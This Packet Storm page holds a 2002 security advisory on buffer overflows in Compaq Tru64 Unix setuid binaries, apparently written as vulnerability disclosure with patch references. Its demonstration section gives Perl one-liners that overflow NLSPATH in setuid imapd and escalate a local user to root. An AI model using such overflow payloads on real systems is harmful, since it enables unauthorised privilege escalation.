exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

TRU64_advisory.txt

TRU64_advisory.txt
Posted Sep 11, 2002
Authored by stripey | Site snosoft.com

Strategic Reconnaissance Team Security Advisory - The Tru64 operating system produced by HP/Compaq contains multiple buffer overflows in multiple system libraries and binaries. Tru64 is now shipped with its non-exec stack implementation enabled by default. This measure is intended to mitigate the risk presented by buffer overflow conditions in setuid binaries - However, it has been proven to be ineffective in preventing an attacker gaining increased privileges through traditional avenues of exploitation.

tags | overflow
SHA-256 | dd37ab957d77b03acf3db538c0909187267cdbbe7b785d465d561374ea3cb0cb

TRU64_advisory.txt

Change Mirror Download
======================================================================
Strategic Reconnaissance Team Security Advisory(SRT2002-09)
Topic: Compaq Tru64 Unix Mulitple Buffer Overflows
Vendor: HP/Compaq
Release Date: 09/04/2002
Author: stripey@snosoft.com
Primary Research by: stripey@snosoft.com
======================================================================

.: Description

The Tru64 operating system produced by HP/Compaq contains multiple
buffer overflows in multiple system libraries and binaries. Tru64
is now shipped with its non-exec stack implementation enabled by
default. This measure is intended to mitigate the risk presented
by buffer overflow conditions in setuid binaries - However, it has
been proven to be ineffective in preventing an attacker gaining
increased priviliges through traditional avenues of exploitation.

Affected binaries include:

/usr/dt/bin/dtprintinfo
/usr/dt/bin/dtsession
/usr/dt/bin/dtaction
/usr/dt/bin/dtterm
/usr/bin/X11/dxsysinfo
/usr/bin/X11/dxconsole
/usr/bin/X11/dxpause
/usr/bin/X11/dxterm
/usr/tcb/bin/dxchpwd
/usr/tcb/bin/edauth
/usr/sbin/imapd
/usr/bin/mh/msgchk
/usr/bin/mh/inc
/usr/bin/deliver
/usr/bin/rdist
/usr/bin/uucp
/usr/bin/uux
/usr/bin/su

Here is a quick look at how one of these issues can be exploited.
It should be fairly self explanatory.

% uname -a
OSF1 alpha.snosoft.com V5.1 732 alpha
% id
uid=208(stripey) gid=15(users)
% ls -la /usr/sbin/imapd
-rws--x--x 1 root bin 789216 Aug 24 2000 /usr/sbin/imapd
% perl -e'$ENV{"NLSPATH"}=("A"x1024)."\x01\x02\x03\x04\x05";exec("/usr/sbin/imapd")'
Segmentation fault
% su
Password:
# cp /usr/sbin/imapd test
# chmod a+r test
# exit
% perl -e'$ENV{"NLSPATH"}=("A"x1024)."\x01\x02\x03\x04\x05";exec("dbx","./test")'
(dbx) r
signal Segmentation fault at
warning: PC value 0x504030200 not valid, trying RA
warning: RA value 0x504030200 not valid, trying text start
warning: text start 0x120000000 not valid, trying data start
warning: Using data start as a text address -- traceback will not work
> [., 0x140000000] call_pal cflush
(dbx) 0x140014280/2X
0x0000000140014280: 0x4141414141414141 0x4141414141414141
(dbx) q
% perl -e'$ENV{"NLSPATH"}=(pack("l",0x47ff041f)x227).(`./sc`).pack("ll",0x40014280,0x1);exec("/usr/sbin/imapd")'
# id
uid=208(stripey) gid=15(users) euid=0(root)
#

.: Impact

A local unpriviliged user can obtain increased permissions regardless of the non-exec stack flag.


.: Workaround

HP/Compaq has provided the following advisory and patches:

HP Advisory Ref: SSRT2257

http://wwss1pro.compaq.com/support/reference_library/viewdocument.asp?source=SRB0039W.xml&dt=11


.: Systems Affected

The following systems are known to be affected by some or all of these issues:

Tru64 5.1
Tru64 5.1A
DgUX 4.0


.: Proof of Concept

See http://www.snosoft.com/research in a few days.


.: Vendor Status

Vendor informed, patches available.


.: References

HP Advisory Ref: SSRT2257


.: Credit

I can not stress enough the amount of dedication and hard work stripey has put into this
project. None of this would be possible without hours upon hours of diligent work from
stripey@snosoft.com


.: DISCLAIMER

Snosoft is in no way responsible for the use or abuse of the provided information.
The Compaq end user is responsible for his or her own local and remote security.

That file you've been guarding, isn't.
-------------------------------------------------------------------
______________________________
/ _____/\______ \__ ___/ | Secure Network Operations
\_____ \ | _/ | | | http://www.snosoft.com
/ \ | | \ | | | recon@snosoft.com
/_______ / |____|_ / |____| |
\/ \/ | Project Cerebrum






Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close